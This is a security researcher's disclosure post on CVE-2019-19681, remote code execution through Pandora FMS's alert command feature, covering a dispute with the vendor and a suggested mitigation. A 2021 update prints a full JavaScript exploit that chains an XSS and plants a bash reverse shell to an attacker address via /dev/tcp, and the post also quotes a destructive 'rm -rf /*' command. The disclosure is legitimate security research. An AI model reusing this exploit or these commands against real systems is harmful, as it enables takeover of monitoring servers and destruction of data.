
CVE-2019-19681 Pandora FMS 7.xx Remote Code Execution via the Alert Manager

#pandorafms#hacking#rce#cve
Last Modified: 2024.01.19.


Note: I copied the article from medium to my home page, so the content is unchanged.

I found a security vulnerability in the Pandora FMS 7 monitoring system. As an authenticated user it is possible to create or modify alerts, actions and commands. An alert can be triggered manually, and the system then executes the connected commands in the context of the application. The commands can be modified via the web application, which simply accepts any string as a command. I used the alert system to obtain root access on the vendor-provided virtual machine.

I got in touch with the vendor and sent them the vulnerability report through a secure channel. They analysed the vulnerability and a few days later I got an answer:

"we open a ticket with the vulnerability you reported to us and after analysing the situation, we can't limit the use of commands because the functionality is like that. What we have been able to make more restrictive is the user profile that can create the commands. Thank you very much for your contribution!"

I understand the "business" point of view, but I do not agree, and I sent them a possible solution: the commands could be defined and stored in a configuration file on the host operating system. They would still be usable from the web application, but from the web application's point of view they would be predefined and immutable.

What happened, and what is the current status?

I posted the whole thing on Medium and reported it to MITRE/NVD. NVD analysed it, concluded it is a vulnerability, and assigned it a CVSS v3 score of 8.8 (CVE-2019-19681).

The vendor came up with the following blog post: (link). In it they explained why my finding is not a security issue. There is an ongoing reanalysis by NVD, so the current status is DISPUTED. (2020.01.28.)

What do I think about it?

I think it is a web application, and a web application should not allow OS commands to be defined like this, even with a Web Admin account. The default configuration is vulnerable, and the software documentation says nothing about it or about how to prevent it.

I think the firewall part of their explanation is only half true. For example, I can store a simple command as a string in their database. The firewall has nothing to do with that, and later the system will execute the command. What if the command is just a simple "rm -rf /*", which has no network impact at all?

Even if the application runs with www-data rights only and the remote shell or remote command is executed as www-data, it is still a Remote Code Execution vulnerability.
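The "predefined, immutable commands" model proposed above, as an added example (not Pandora FMS code): the command lines live in a root-owned config file on the host, the web layer can only name one of them and supply validated parameters, and execution never goes through a shell. The config text, the file path and the parameter rules are constructed for illustration.

```python
import re
import shlex
import subprocess
import configparser

# Constructed config text standing in for a root-owned host file such as
# /etc/pandora/alert_commands.conf (hypothetical path): the only place a command line exists.
ALERT_COMMANDS_CONF = """
[mail_to_admin]
argv = /usr/bin/mail -s {subject} {recipient}
params = subject recipient

[ping_host]
argv = /bin/ping -c 3 {host}
params = host
"""

# One allowlist regex per placeholder; none admits shell metacharacters or quotes.
PARAM_RULES = {
    "subject": re.compile(r"[\w .:-]{1,120}"),
    "recipient": re.compile(r"[\w.+-]+@[\w.-]+"),
    "host": re.compile(r"[A-Za-z0-9.-]{1,253}"),
}

def load_command_registry(conf_text):
    """Parse the host config into {name: {"argv": [...], "params": [...]}}."""
    cp = configparser.ConfigParser()
    cp.read_string(conf_text)
    return {name: {"argv": shlex.split(cp[name]["argv"]),
                   "params": cp[name]["params"].split()}
            for name in cp.sections()}

def build_argv(registry, name, params):
    """Resolve a web-layer request (command name + parameters) into a fixed argv, or refuse."""
    if name not in registry:                       # a free-form string is never a command
        raise ValueError("unknown alert command: %r" % name)
    spec = registry[name]
    if set(params) != set(spec["params"]):         # no extra, no missing parameters
        raise ValueError("parameter set does not match the command definition")
    for key, value in params.items():
        rule = PARAM_RULES.get(key)                # a parameter with no validator is refused
        if rule is None or not rule.fullmatch(value):
            raise ValueError("invalid value for parameter %r" % key)
    # Each placeholder is filled inside its own argv element; the list is never re-parsed.
    return [tok.format(**params) for tok in spec["argv"]]

def run_alert_command(registry, name, params):
    """Execute without a shell, so no argv element can be reinterpreted as shell syntax."""
    argv = build_argv(registry, name, params)
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=30)
```

With this layout a stored alert only references a command name, so a value written into the database by the web layer (or by an XSS running as a logged-in user) can never become a new command line.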

Update (2021.07.25)

My story with Pandora FMS has come to an end. I revisited all of the CVEs, and here is my last comment about this one.

Regardless of whether the alert feature is itself a vulnerability, it can be combined with other vulnerabilities, which can lead to Remote Code Execution, similar to CVE-2021-34074.

I created a low-level user with Operator write permission and used the original XSS for this version (CVE-2019-19968). I chained the XSS vulnerability with the "Alert feature" and obtained remote code execution.

Earlier it was only exploitable with an admin user; now it is possible with a lower-level user too.

Technical Details

The Target IP address was 192.168.0.33 and the Attacker IP address was 192.168.0.37.

1. Login with the default credentials (pandora, admin)
2. Create an Alert
3. Select the Alerts option of pandorafms
4. Add an Alert and select the "Mail to Admin" Action
5. Select Commands from the menu
6. Add Command
7. Configure Mail to Admin
8. Listen on port 9000
9. Trigger the alert manually
10. Proof

© 2019-2021 Kamilló Matek All Rights Reserved

2021.07.25 - XSS - Chained Exploit UPDATE

The following picture contains the attack steps:


The XSS example:


The target IP address was 192.168.0.90 and the attacker IP address was 192.168.0.99. I used my homepage to host the JavaScript exploit. Note: the certificate is important!

The JavaScript Payload


/////////////////////////////////////////////////////////////
// Author: k4m1ll0 (matek.kamillo@gmail.com)
// Date: 2021.07.25.
// Pandora FMS 742 XSS + Alert Feature/Alert Vulnerability
///////////////////////////////////////////////////////////

// Runs in the victim's browser session (delivered via the XSS), so every
// synchronous XMLHttpRequest below carries the victim's Pandora FMS cookies.
var IP = '192.168.0.90';
var ATTACKER_IP = '192.168.0.99';
var ATTACKER_PORT = '2000';

// Step 1: define a new alert command whose command string is the reverse shell
function create_new_alert_command()
{
	var xhr = new XMLHttpRequest();
	xhr.open('POST', 'https://' + IP + '/pandora_console/index.php?sec=galertas&sec2=godmode/alerts/alert_commands&pure=0', false);
	var params = 'name=k44revshell&command=/bin/bash+-i+>%26+/dev/tcp/' + ATTACKER_IP + '/' + ATTACKER_PORT + '+0>%261&id_group=0&create_command=1&create=Create';
	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	xhr.send(params);
	return xhr.response.toString();
}

// Scrape the id of the new command from the returned command list.
// The end delimiter is an empty string as published, so indexOf('') returns
// start_idx and this function yields an empty id.
function find_command_id(s)
{
	var idx = s.indexOf('k44revshell');
	var start_idx = s.indexOf('datos2 \"', idx) + 9;
	var end_idx = s.indexOf('', start_idx);
	return s.substr(start_idx, end_idx - start_idx);
}

// Step 2: create an alert action bound to that command
function create_action(command_id)
{
	var xhr = new XMLHttpRequest();
	xhr.open('POST', 'https://' + IP + '/pandora_console/index.php?sec=galertas&sec2=godmode/alerts/alert_actions&pure=0', false);
	var params = 'name=K44TESTACTION&group=0&id_command=' + command_id + '&action_threshold=0&create_action=1&create=Create';
	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	xhr.send(params);
	return xhr.response.toString();
}

// Scrape the action id from the "&id=" link preceding the action name
function find_action_id(s)
{
	var idx = s.indexOf('K44TESTACTION');
	var start_idx = s.lastIndexOf('&id=', idx) + 4;
	var end_idx = s.indexOf('&', start_idx);
	return s.substr(start_idx, end_idx - start_idx);
}

// Step 3: load the agent list
function visit_agents()
{
	var xhr = new XMLHttpRequest();
	xhr.open('GET', 'https://' + IP + '/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/modificar_agente', false);
	xhr.send();
	return xhr.response.toString();
}

// Find the id of the server's own agent by its version string
function find_agent_id(s)
{
	var idx = s.indexOf('Pandora FMS Server version 7.0NG.742');
	var start_idx = s.lastIndexOf('id_agente=', idx) + 10;
	var end_idx = s.indexOf('"', start_idx);
	return s.substr(start_idx, end_idx - start_idx);
}

// Step 4: attach an alert (module 30, template 2) using the action to that agent
function create_alert(agent_id, action_id)
{
	var xhr = new XMLHttpRequest();
	xhr.open('POST', 'https://' + IP + '/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=alert&id_agente=' + agent_id, false);
	var params = 'id_agent_module=30&action_select=' + action_id + '&template=2&module_action_threshold=0&add=Add+alert&create_alert=1';
	xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
	xhr.send(params);
}

// Step 5: load the agent view, which contains the manual trigger link of the alert
function visit_agent_view(agent_id)
{
	var xhr = new XMLHttpRequest();
	xhr.open('GET', 'https://' + IP + '/pandora_console/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=' + agent_id, false);
	xhr.send();
	return xhr.response.toString();
}

// Scrape the relative href of the trigger link next to the action name
function find_trigger_url(s)
{
	var idx = s.indexOf('K44TESTACTION');
	var start_idx = s.lastIndexOf('href="index.php?sec=estado', idx) + 6;
	var end_idx = s.indexOf('"', start_idx);
	return s.substr(start_idx, end_idx - start_idx);
}

// Step 6: request the trigger link; the server then executes the command
function trigger_alert(url)
{
	var xhr = new XMLHttpRequest();
	xhr.open('GET', url, false);
	xhr.send();
}

function exploit()
{
	// Step 1
	var str = create_new_alert_command();
	var command_id = find_command_id(str);

	// Step 2
	str = create_action(command_id);
	var action_id = find_action_id(str);

	// Step 3
	str = visit_agents();
	var agent_id = find_agent_id(str);

	// Step 4
	create_alert(agent_id, action_id);

	// Step 5
	str = visit_agent_view(agent_id);
	var trigger_url = 'https://' + IP + '/pandora_console/' + find_trigger_url(str);
	// the href is HTML-escaped ('&amp;'); decode it back to '&' before requesting (assumed encoding)
	trigger_url = trigger_url.replaceAll('&amp;', '&');

	// Step 6
	trigger_alert(trigger_url);
}

exploit();


Demonstration Video - Updated

© 2019-2024 Kamilló Matek (k4m1ll0) All Rights Reserved